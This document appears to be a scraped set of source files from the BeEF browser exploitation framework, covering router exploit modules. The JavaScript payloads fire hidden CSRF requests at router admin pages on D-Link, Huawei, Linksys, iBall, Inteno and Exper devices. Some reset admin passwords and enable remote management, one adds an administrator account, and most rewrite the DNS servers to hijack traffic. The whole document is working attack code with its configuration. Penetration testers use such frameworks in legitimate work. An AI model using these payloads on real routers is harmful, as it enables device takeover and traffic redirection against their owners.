# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # class Ddwrt_v24_sp1_csrf < BeEF::Core::Command def self.options [ { 'name' => 'host', 'ui_label' => 'Router web root', 'value' => 'http://192.168.1.1/' }, { 'name' => 'password', 'ui_label' => 'Desired password', 'value' => '__BeEF__' }, { 'name' => 'port', 'ui_label' => 'Desired web ui port', 'value' => '8080' }, { 'name' => 'telnet', 'ui_label' => 'Desired telnet port', 'value' => '23' } ] end def post_execute save('result' => @datastore['result']) end end
JavaScript
beef/modules/exploits/router/dlink_dir_615_csrf/command.js
// // Copyright (c) 2006-2023Wade Alcorn - [email protected] // Browser Exploitation Framework (BeEF) - http://beefproject.com // See the file 'doc/COPYING' for copying permission // beef.execute(function() { var gateway = '<%= @base %>'; var passwd = '<%= @password %>'; var timeout = 15; var dir615_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "tools_admin.php", "POST", "application/x-www-form-urlencoded", [{'type':'hidden', 'name':'ACTION_POST', 'value':'1'} , {'type':'hidden', 'name':'apply', 'value':'Save Settings'}, {'type':'hidden', 'name':'admin_name', 'value':'admin'}, {'type':'hidden', 'name':'admin_password1', 'value':passwd}, {'type':'hidden', 'name':'admin_password2', 'value':passwd}, {'type':'hidden', 'name':'rt_enable', 'value':'on'}, {'type':'hidden', 'name':'rt_enable_h', 'value':'1'}, {'type':'hidden', 'name':'rt_ipaddr', 'value':'0.0.0.0'}, {'type':'hidden', 'name':'rt_port', 'value':'8080'} ]); beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted"); cleanup = function() { document.body.removeChild(dir615_iframe_<%= @command_id %>); } setTimeout("cleanup()", timeout*1000); });
YAML
beef/modules/exploits/router/dlink_dir_615_csrf/config.yaml
# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # beef: module: dlink_dir_615_csrf: enable: true category: ["Exploits", "Router"] name: "D-Link DIR-615 Password Wipe" description: "Attempts to enable remote administration on port 8080 and change the admin password on a D-Link DIR-615 router." authors: ["antisnatchor", "n0x00"] target: working: ["ALL"]
Ruby
beef/modules/exploits/router/dlink_dir_615_csrf/module.rb
# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # class Dlink_dir_615_csrf < BeEF::Core::Command def self.options [ { 'name' => 'base', 'ui_label' => 'Router web root', 'value' => 'http://192.168.0.1/' }, { 'name' => 'password', 'ui_label' => 'Desired password', 'value' => '__BeEF__' } ] end def post_execute save({ 'result' => @datastore['result'] }) end end
JavaScript
beef/modules/exploits/router/dlink_dsl2640b_dns_hijack/command.js
// // Copyright (c) 2006-2023Wade Alcorn - [email protected] // Browser Exploitation Framework (BeEF) - http://beefproject.com // See the file 'doc/COPYING' for copying permission // beef.execute(function() { // config var target = 'http://<%= @rhost %>/ddnsmngr.cmd'; var dns1 = '<%= @dns1 %>'; var dns2 = '<%= @dns2 %>'; var timeout = 15; // validate DNS server IP addresses if (!beef.net.is_valid_ip(dns1)) { beef.debug('Invalid Primary DNS server IP address was provided'); beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=an invalid Primary DNS server IP address was provided"); return; } if (!beef.net.is_valid_ip(dns2)) { beef.debug('Invalid Secondary DNS server IP address was provided'); beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=an invalid Secondary DNS server IP address was provided"); return; } // change DNS var dlink_2640b_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(target, "GET", "application/x-www-form-urlencoded", [ {'type':'hidden', 'name':'action', 'value': 'apply'}, {'type':'hidden', 'name':'service', 'value': '0'}, {'type':'hidden', 'name':'enbl', 'value': '0'}, {'type':'hidden', 'name':'dnsPrimary', 'value': dns1}, {'type':'hidden', 'name':'dnsSecondary', 'value': dns2}, {'type':'hidden', 'name':'dnsDynamic', 'value': '0'}, {'type':'hidden', 'name':'dnsRefresh', 'value': '1'}, {'type':'hidden', 'name':'dns6Type', 'value': 'DHCP'} ]); beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted"); // clean up cleanup = function() { document.body.removeChild(dlink_2640b_iframe_<%= @command_id %>); } setTimeout("cleanup()", timeout*1000); });
YAML
beef/modules/exploits/router/dlink_dsl2640b_dns_hijack/config.yaml
# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # # References: # http://www.exploit-db.com/exploits/36105/ # beef: module: dlink_2640b_dns_hijack: enable: true category: ["Exploits", "Router"] name: "D-Link DSL-2640B DNS Hijack" description: "Attempts to change the DNS setting on a D-Link DSL-2640B router.<br/><br/>The D-Link DSL-2640B reportedly does not require authentication to change the DNS servers.<br/><br/>This module has not been tested." authors: ["Todor Donev"] target: unknown: ["ALL"]
Ruby
beef/modules/exploits/router/dlink_dsl2640b_dns_hijack/module.rb
# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # class Dlink_2640b_dns_hijack < BeEF::Core::Command def self.options [ { 'name' => 'rhost', 'ui_label' => 'Remote Host', 'value' => '192.168.1.1' }, { 'name' => 'dns1', 'ui_label' => 'Primary DNS Server', 'value' => '8.8.8.8' }, { 'name' => 'dns2', 'ui_label' => 'Secondary DNS Server', 'value' => '8.8.4.4' } ] end def post_execute save({ 'result' => @datastore['result'] }) end end
JavaScript
beef/modules/exploits/router/dlink_dsl2640u_dns_hijack/command.js
// // Copyright (c) 2006-2023Wade Alcorn - [email protected] // Browser Exploitation Framework (BeEF) - http://beefproject.com // See the file 'doc/COPYING' for copying permission // beef.execute(function() { // config var target = 'http://<%= @rhost %>/dnscfg.cgi'; var dns1 = '<%= @dns1 %>'; var dns2 = '<%= @dns2 %>'; var timeout = 15; // validate DNS server IP addresses if (!beef.net.is_valid_ip(dns1)) { beef.debug('Invalid Primary DNS server IP address was provided'); beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=an invalid Primary DNS server IP address was provided"); return; } if (!beef.net.is_valid_ip(dns2)) { beef.debug('Invalid Secondary DNS server IP address was provided'); beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=an invalid Secondary DNS server IP address was provided"); return; } // change DNS var dlink_dsl2640u_adsl_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(target, "GET", "application/x-www-form-urlencoded", [ {'type':'hidden', 'name':'dnsPrimary', 'value': dns1}, {'type':'hidden', 'name':'dnsSecondary', 'value': dns2}, {'type':'hidden', 'name':'dnsDynamic', 'value': '0'}, {'type':'hidden', 'name':'dnsRefresh', 'value': '1'} ]); beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted"); // clean up cleanup = function() { document.body.removeChild(dlink_dsl2640u_adsl_iframe_<%= @command_id %>); } setTimeout("cleanup()", timeout*1000); });
YAML
beef/modules/exploits/router/dlink_dsl2640u_dns_hijack/config.yaml
# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # # References: # https://www.exploit-db.com/exploits/42195/ # beef: module: dlink_dsl2640u_dns_hijack: enable: true category: ["Exploits", "Router"] name: "D-Link DSL-2640U ADSL Router DNS Hijack" description: "Attempts to change the DNS setting on a D-Link DSL-2640U ADSL router.<br/><br/>This router reportedly does not require authentication to change the DNS servers.<br/><br/>This module has not been tested." authors: ["Todor Donev"] target: unknown: ["ALL"]
Ruby
beef/modules/exploits/router/dlink_dsl2640u_dns_hijack/module.rb
# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # class Dlink_dsl2640u_dns_hijack < BeEF::Core::Command def self.options [ { 'name' => 'rhost', 'ui_label' => 'Remote Host', 'value' => '192.168.1.1' }, { 'name' => 'dns1', 'ui_label' => 'Primary DNS Server', 'value' => '8.8.8.8' }, { 'name' => 'dns2', 'ui_label' => 'Secondary DNS Server', 'value' => '8.8.4.4' } ] end def post_execute save({ 'result' => @datastore['result'] }) end end
JavaScript
beef/modules/exploits/router/dlink_dsl2740r_dns_hijack/command.js
// // Copyright (c) 2006-2023Wade Alcorn - [email protected] // Browser Exploitation Framework (BeEF) - http://beefproject.com // See the file 'doc/COPYING' for copying permission // beef.execute(function() { // config var target = 'http://<%= @rhost %>/Forms/dns_1'; var dns1 = '<%= @dns1 %>'; var dns2 = '<%= @dns2 %>'; var timeout = 15; // validate DNS server IP addresses if (!beef.net.is_valid_ip(dns1)) { beef.debug('Invalid Primary DNS server IP address was provided'); beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=an invalid Primary DNS server IP address was provided"); return; } if (!beef.net.is_valid_ip(dns2)) { beef.debug('Invalid Secondary DNS server IP address was provided'); beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=an invalid Secondary DNS server IP address was provided"); return; } // change DNS var dlink_dsl2740r_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(target, "GET", "application/x-www-form-urlencoded", [ {'type':'hidden', 'name':'Enable_DNSFollowing', 'value':'1'}, {'type':'hidden', 'name':'dnsPrimary', 'value':dns1}, {'type':'hidden', 'name':'dnsSecondary', 'value':dns2} ]); beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted"); // clean up cleanup = function() { document.body.removeChild(dlink_dsl2740r_<%= @command_id %>); } setTimeout("cleanup()", timeout*1000); });
YAML
beef/modules/exploits/router/dlink_dsl2740r_dns_hijack/config.yaml
# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # # References: # http://www.exploit-db.com/exploits/35917/ # beef: module: dlink_dsl2740r_dns_hijack: enable: true category: ["Exploits", "Router"] name: "D-Link DSL-2740R DNS Hijack" description: "Attempts to change the DNS setting on D-Link DSL-2740R routers.<br/><br/>D-Link DSL-2740R routers reportedly do not require authentication to change the DNS servers.<br/><br/>This module has not been tested." authors: ["Todor Donev"] target: unknown: ["ALL"]
Ruby
beef/modules/exploits/router/dlink_dsl2740r_dns_hijack/module.rb
# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # class Dlink_dsl2740r_dns_hijack < BeEF::Core::Command def self.options [ { 'name' => 'rhost', 'ui_label' => 'Remote Host', 'value' => '192.168.1.1' }, { 'name' => 'dns1', 'ui_label' => 'Primary DNS Server', 'value' => '8.8.8.8' }, { 'name' => 'dns2', 'ui_label' => 'Secondary DNS Server', 'value' => '8.8.4.4' } ] end def post_execute save({ 'result' => @datastore['result'] }) end end
JavaScript
beef/modules/exploits/router/dlink_dsl2780b_dns_hijack/command.js
// // Copyright (c) 2006-2023Wade Alcorn - [email protected] // Browser Exploitation Framework (BeEF) - http://beefproject.com // See the file 'doc/COPYING' for copying permission // beef.execute(function() { // config var target = 'http://<%= @rhost %>/dnscfg.cgi'; var dns1 = '<%= @dns1 %>'; var dns2 = '<%= @dns2 %>'; var timeout = 15; // validate DNS server IP addresses if (!beef.net.is_valid_ip(dns1)) { beef.debug('Invalid Primary DNS server IP address was provided'); beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=an invalid Primary DNS server IP address was provided"); return; } if (!beef.net.is_valid_ip(dns2)) { beef.debug('Invalid Secondary DNS server IP address was provided'); beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=an invalid Secondary DNS server IP address was provided"); return; } // change DNS var dlink_dsl2780b_adsl_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(target, "GET", "application/x-www-form-urlencoded", [ {'type':'hidden', 'name':'dnsPrimary', 'value': dns1}, {'type':'hidden', 'name':'dnsSecondary', 'value': dns2}, {'type':'hidden', 'name':'dnsDynamic', 'value': '0'}, {'type':'hidden', 'name':'dnsRefresh', 'value': '1'} ]); beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted"); // clean up cleanup = function() { document.body.removeChild(dlink_dsl2780b_adsl_iframe_<%= @command_id %>); } setTimeout("cleanup()", timeout*1000); });
YAML
beef/modules/exploits/router/dlink_dsl2780b_dns_hijack/config.yaml
# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # # References: # https://www.exploit-db.com/exploits/37237/ # beef: module: dlink_dsl2780b_dns_hijack: enable: true category: ["Exploits", "Router"] name: "D-Link DSL-2780B ADSL Router DNS Hijack" description: "Attempts to change the DNS setting on a D-Link DSL-2780B ADSL router.<br/><br/>This router reportedly does not require authentication to change the DNS servers.<br/><br/>This module has not been tested." authors: ["Todor Donev"] target: unknown: ["ALL"]
Ruby
beef/modules/exploits/router/dlink_dsl2780b_dns_hijack/module.rb
# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # class Dlink_dsl2780b_dns_hijack < BeEF::Core::Command def self.options [ { 'name' => 'rhost', 'ui_label' => 'Remote Host', 'value' => '192.168.1.1' }, { 'name' => 'dns1', 'ui_label' => 'Primary DNS Server', 'value' => '8.8.8.8' }, { 'name' => 'dns2', 'ui_label' => 'Secondary DNS Server', 'value' => '8.8.4.4' } ] end def post_execute save({ 'result' => @datastore['result'] }) end end
JavaScript
beef/modules/exploits/router/dlink_dsl500t_csrf/command.js
// // Copyright (c) 2006-2023Wade Alcorn - [email protected] // Browser Exploitation Framework (BeEF) - http://beefproject.com // See the file 'doc/COPYING' for copying permission // beef.execute(function() { var gateway = '<%= @base %>'; var passwd = '<%= @password %>'; var timeout = 15; var dsl500t_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "cgi-bin/webcm", "POST", "application/x-www-form-urlencoded", [{'type':'hidden', 'name':'getpage', 'value':'../html/tools/usrmgmt.htm'} , {'type':'hidden', 'name':'security:settings/username', 'value':'admin'}, {'type':'hidden', 'name':'security:settings/password', 'value':passwd}, {'type':'hidden', 'name':'security:settings/password_confirm', 'value':passwd}, {'type':'hidden', 'name':'security:settings/idle_timeout', 'value':'30'} ]); beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted"); cleanup = function() { document.body.removeChild(dsl500t_iframe_<%= @command_id %>); } setTimeout("cleanup()", timeout*1000); });
YAML
beef/modules/exploits/router/dlink_dsl500t_csrf/config.yaml
# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # beef: module: dlink_dsl500t_csrf: enable: true category: ["Exploits", "Router"] name: "D-Link DSL500T CSRF" description: "Attempts to change the password on a D-Link DSL500T router." authors: ["bcoles"] target: working: ["ALL"]
Ruby
beef/modules/exploits/router/dlink_dsl500t_csrf/module.rb
# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # class Dlink_dsl500t_csrf < BeEF::Core::Command def self.options [ { 'name' => 'base', 'ui_label' => 'Router web root', 'value' => 'http://192.168.1.1/' }, { 'name' => 'password', 'ui_label' => 'Desired password', 'value' => '__BeEF__' } ] end def post_execute save({ 'result' => @datastore['result'] }) end end
JavaScript
beef/modules/exploits/router/dlink_dsl526b_dns_hijack/command.js
// // Copyright (c) 2006-2023Wade Alcorn - [email protected] // Browser Exploitation Framework (BeEF) - http://beefproject.com // See the file 'doc/COPYING' for copying permission // beef.execute(function() { // config var target = 'http://<%= @rhost %>/dnscfg.cgi'; var dns1 = '<%= @dns1 %>'; var dns2 = '<%= @dns2 %>'; var timeout = 15; // validate DNS server IP addresses if (!beef.net.is_valid_ip(dns1)) { beef.debug('Invalid Primary DNS server IP address was provided'); beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=an invalid Primary DNS server IP address was provided"); return; } if (!beef.net.is_valid_ip(dns2)) { beef.debug('Invalid Secondary DNS server IP address was provided'); beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=an invalid Secondary DNS server IP address was provided"); return; } // change DNS var dlink_dsl526b_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(target, "GET", "application/x-www-form-urlencoded", [ {'type':'hidden', 'name':'dnsPrimary', 'value': dns1}, {'type':'hidden', 'name':'dnsSecondary', 'value': dns2}, {'type':'hidden', 'name':'dnsDynamic', 'value': '0'}, {'type':'hidden', 'name':'dnsRefresh', 'value': '1'} ]); beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted"); // clean up cleanup = function() { document.body.removeChild(dlink_dsl526b_iframe_<%= @command_id %>); } setTimeout("cleanup()", timeout*1000); });
YAML
beef/modules/exploits/router/dlink_dsl526b_dns_hijack/config.yaml
# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # # References: # https://www.exploit-db.com/exploits/37241/ # beef: module: dlink_dsl526b_dns_hijack: enable: true category: ["Exploits", "Router"] name: "D-Link DSL-526B ADSL Router DNS Hijack" description: "Attempts to change the DNS setting on a D-Link DSL-526B ADSL router.<br/><br/>This router reportedly does not require authentication to change the DNS servers.<br/><br/>This module has not been tested." authors: ["Todor Donev"] target: unknown: ["ALL"]
Ruby
beef/modules/exploits/router/dlink_dsl526b_dns_hijack/module.rb
# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # class Dlink_dsl526b_dns_hijack < BeEF::Core::Command def self.options [ { 'name' => 'rhost', 'ui_label' => 'Remote Host', 'value' => '192.168.1.1' }, { 'name' => 'dns1', 'ui_label' => 'Primary DNS Server', 'value' => '8.8.8.8' }, { 'name' => 'dns2', 'ui_label' => 'Secondary DNS Server', 'value' => '8.8.4.4' } ] end def post_execute save({ 'result' => @datastore['result'] }) end end
JavaScript
beef/modules/exploits/router/exper_ewm01_adsl_dns_hijack/command.js
// // Copyright (c) 2006-2023 Wade Alcorn - [email protected] // Browser Exploitation Framework (BeEF) - http://beefproject.com // See the file 'doc/COPYING' for copying permission // beef.execute(function() { // config var target = 'http://<%= @rhost %>/dnscfg.cgi'; var dns1 = '<%= @dns1 %>'; var dns2 = '<%= @dns2 %>'; var timeout = 15; // validate DNS server IP addresses if (!beef.net.is_valid_ip(dns1)) { beef.debug('Invalid Primary DNS server IP address was provided'); beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=an invalid Primary DNS server IP address was provided"); return; } if (!beef.net.is_valid_ip(dns2)) { beef.debug('Invalid Secondary DNS server IP address was provided'); beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=an invalid Secondary DNS server IP address was provided"); return; } // change DNS var exper_ewm01_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(target, "GET", "application/x-www-form-urlencoded", [ {'type':'hidden', 'name':'dnsPrimary', 'value': dns1}, {'type':'hidden', 'name':'dnsSecondary', 'value': dns2}, {'type':'hidden', 'name':'dnsDynamic', 'value': '0'}, {'type':'hidden', 'name':'dnsRefresh', 'value': '1'} ]); beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted"); // clean up cleanup = function() { document.body.removeChild(exper_ewm01_iframe_<%= @command_id %>); } setTimeout("cleanup()", timeout*1000); });
YAML
beef/modules/exploits/router/exper_ewm01_adsl_dns_hijack/config.yaml
# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # # References: # https://www.exploit-db.com/exploits/40367/ # beef: module: exper_ewm01_adsl_dns_hijack: enable: true category: ["Exploits", "Router"] name: "Exper EWM-01 ADSL Router DNS Hijack" description: "Attempts to change the DNS setting on a Exper EWM-01 ADSL router.<br/><br/>This router reportedly does not require authentication to change the DNS servers.<br/><br/>This module has not been tested." authors: ["Todor Donev"] target: unknown: ["ALL"]
Ruby
beef/modules/exploits/router/exper_ewm01_adsl_dns_hijack/module.rb
# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # class Exper_ewm01_adsl_dns_hijack < BeEF::Core::Command def self.options [ { 'name' => 'rhost', 'ui_label' => 'Remote Host', 'value' => '192.168.1.1' }, { 'name' => 'dns1', 'ui_label' => 'Primary DNS Server', 'value' => '8.8.8.8' }, { 'name' => 'dns2', 'ui_label' => 'Secondary DNS Server', 'value' => '8.8.4.4' } ] end def post_execute save({ 'result' => @datastore['result'] }) end end
JavaScript
beef/modules/exploits/router/huawei_smartax_mt880/command.js
// // Copyright (c) 2006-2023Wade Alcorn - [email protected] // Browser Exploitation Framework (BeEF) - http://beefproject.com // See the file 'doc/COPYING' for copying permission // beef.execute(function() { var gateway = '<%= @base %>'; var username = '<%= @username %>'; var passwd = '<%= @password %>'; var timeout = 15; var huawei_smartax_mt880_iframe_<%= @command_id %> = beef.dom.createInvisibleIframe(); huawei_smartax_mt880_iframe_<%= @command_id %>.setAttribute('src', gateway+"Action?user_id="+username+"&priv=1&pass1="+passwd+"&pass2="+passwd+"&id=70"); beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted"); cleanup = function() { document.body.removeChild(huawei_smartax_mt880_iframe_<%= @command_id %>); } setTimeout("cleanup()", timeout*1000); });
YAML
beef/modules/exploits/router/huawei_smartax_mt880/config.yaml
# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # beef: module: Huawei_smartax_mt880_csrf: enable: true category: ["Exploits", "Router"] name: "Huawei SmartAX MT880 CSRF" description: "Attempts to add an administrator account on a Huawei SmartAX MT880 router." authors: ["bcoles"] target: working: ["ALL"]
Ruby
beef/modules/exploits/router/huawei_smartax_mt880/module.rb
# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # class Huawei_smartax_mt880_csrf < BeEF::Core::Command def self.options [ { 'name' => 'base', 'ui_label' => 'Router web root', 'value' => 'http://192.168.1.1/' }, { 'name' => 'username', 'ui_label' => 'Desired username', 'value' => 'BeEF' }, { 'name' => 'password', 'ui_label' => 'Desired password', 'value' => '__BeEF__' } ] end def post_execute save({ 'result' => @datastore['result'] }) end end
JavaScript
beef/modules/exploits/router/iball_baton_ib_wra150n_dns_hijack/command.js
// // Copyright (c) 2006-2023Wade Alcorn - [email protected] // Browser Exploitation Framework (BeEF) - http://beefproject.com // See the file 'doc/COPYING' for copying permission // beef.execute(function() { // config var target = 'http://<%= @rhost %>/dnscfg.cgi'; var dns1 = '<%= @dns1 %>'; var dns2 = '<%= @dns2 %>'; var timeout = 15; // validate DNS server IP addresses if (!beef.net.is_valid_ip(dns1)) { beef.debug('Invalid Primary DNS server IP address was provided'); beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=an invalid Primary DNS server IP address was provided"); return; } if (!beef.net.is_valid_ip(dns2)) { beef.debug('Invalid Secondary DNS server IP address was provided'); beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=an invalid Secondary DNS server IP address was provided"); return; } // change DNS var iball_baton_ib_wra150n_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(target, "GET", "application/x-www-form-urlencoded", [ {'type':'hidden', 'name':'dnsPrimary', 'value': dns1}, {'type':'hidden', 'name':'dnsSecondary', 'value': dns2}, {'type':'hidden', 'name':'dnsDynamic', 'value': '0'}, {'type':'hidden', 'name':'dnsRefresh', 'value': '1'} ]); beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted"); // clean up cleanup = function() { document.body.removeChild(iball_baton_ib_wra150n_iframe_<%= @command_id %>); } setTimeout("cleanup()", timeout*1000); });
YAML
beef/modules/exploits/router/iball_baton_ib_wra150n_dns_hijack/config.yaml
# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # # References: # https://www.exploit-db.com/exploits/42192/ # beef: module: iball_baton_ib_wra150n_dns_hijack: enable: true category: ["Exploits", "Router"] name: "iBall Baton iB-WRA150N DNS Hijack" description: "Attempts to change the DNS setting on a iBall Baton iB-WRA150N router.<br/><br/>This router reportedly does not require authentication to change the DNS servers.<br/><br/>This module has not been tested." authors: ["Todor Donev"] target: unknown: ["ALL"]
Ruby
beef/modules/exploits/router/iball_baton_ib_wra150n_dns_hijack/module.rb
# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # class Iball_baton_ib_wra150n_dns_hijack < BeEF::Core::Command def self.options [ { 'name' => 'rhost', 'ui_label' => 'Remote Host', 'value' => '192.168.1.1' }, { 'name' => 'dns1', 'ui_label' => 'Primary DNS Server', 'value' => '8.8.8.8' }, { 'name' => 'dns2', 'ui_label' => 'Secondary DNS Server', 'value' => '8.8.4.4' } ] end def post_execute save({ 'result' => @datastore['result'] }) end end
JavaScript
beef/modules/exploits/router/inteno_eg101r1_voip_dns_hijack/command.js
// // Copyright (c) 2006-2023Wade Alcorn - [email protected] // Browser Exploitation Framework (BeEF) - http://beefproject.com // See the file 'doc/COPYING' for copying permission // beef.execute(function() { // config var target = 'http://<%= @rhost %>/dnscfg.cgi'; var dns1 = '<%= @dns1 %>'; var dns2 = '<%= @dns2 %>'; var timeout = 15; // validate DNS server IP addresses if (!beef.net.is_valid_ip(dns1)) { beef.debug('Invalid Primary DNS server IP address was provided'); beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=an invalid Primary DNS server IP address was provided"); return; } if (!beef.net.is_valid_ip(dns2)) { beef.debug('Invalid Secondary DNS server IP address was provided'); beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=an invalid Secondary DNS server IP address was provided"); return; } // change DNS var inteno_eg101r1_voip_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(target, "GET", "application/x-www-form-urlencoded", [ {'type':'hidden', 'name':'dnsPrimary', 'value': dns1}, {'type':'hidden', 'name':'dnsSecondary', 'value': dns2}, {'type':'hidden', 'name':'dnsDynamic', 'value': '0'}, {'type':'hidden', 'name':'dnsRefresh', 'value': '1'} ]); beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted"); // clean up cleanup = function() { document.body.removeChild(inteno_eg101r1_voip_iframe_<%= @command_id %>); } setTimeout("cleanup()", timeout*1000); });
YAML
beef/modules/exploits/router/inteno_eg101r1_voip_dns_hijack/config.yaml
# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # # References: # https://www.exploit-db.com/exploits/40368/ # beef: module: inteno_eg101r1_voip_dns_hijack: enable: true category: ["Exploits", "Router"] name: "Inteno EG101R1 VoIP Router DNS Hijack" description: "Attempts to change the DNS setting on a Inteno EG101R1 VoIP router.<br/><br/>The Inteno EG101R1 VoIP router reportedly does not require authentication to change the DNS servers.<br/><br/>This module has not been tested." authors: ["Todor Donev"] target: unknown: ["ALL"]
Ruby
beef/modules/exploits/router/inteno_eg101r1_voip_dns_hijack/module.rb
# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # class Inteno_eg101r1_voip_dns_hijack < BeEF::Core::Command def self.options [ { 'name' => 'rhost', 'ui_label' => 'Remote Host', 'value' => '192.168.1.1' }, { 'name' => 'dns1', 'ui_label' => 'Primary DNS Server', 'value' => '8.8.8.8' }, { 'name' => 'dns2', 'ui_label' => 'Secondary DNS Server', 'value' => '8.8.4.4' } ] end def post_execute save({ 'result' => @datastore['result'] }) end end
JavaScript
beef/modules/exploits/router/linksys_befsr41_csrf/command.js
// // Copyright (c) 2006-2023Wade Alcorn - [email protected] // Browser Exploitation Framework (BeEF) - http://beefproject.com // See the file 'doc/COPYING' for copying permission // beef.execute(function() { var timeout = 15; var befsr41_iframe_<%= @command_id %> = beef.dom.createInvisibleIframe(); befsr41_iframe_<%= @command_id %>.setAttribute('src', '<%= @base %>Gozila.cgi?PasswdModify=1&sysPasswd=<%= @password %>&sysPasswdConfirm=<%= @password %>&Remote_Upgrade=1&Remote_Management=1&RemotePort=<%= @port %>&UPnP_Work=0'); beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted"); cleanup = function() { document.body.removeChild(befsr41_iframe_<%= @command_id %>); } setTimeout("cleanup()", timeout*1000); });
YAML
beef/modules/exploits/router/linksys_befsr41_csrf/config.yaml
# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # beef: module: linksys_befsr41_csrf: enable: true category: ["Exploits", "Router"] name: "Linksys BEFSR41 CSRF" description: "Attempts to enable remote administration and change the password on a Linksys BEFSR41 router." authors: ["Martin Barbella"] target: working: ["ALL"]
Ruby
beef/modules/exploits/router/linksys_befsr41_csrf/module.rb
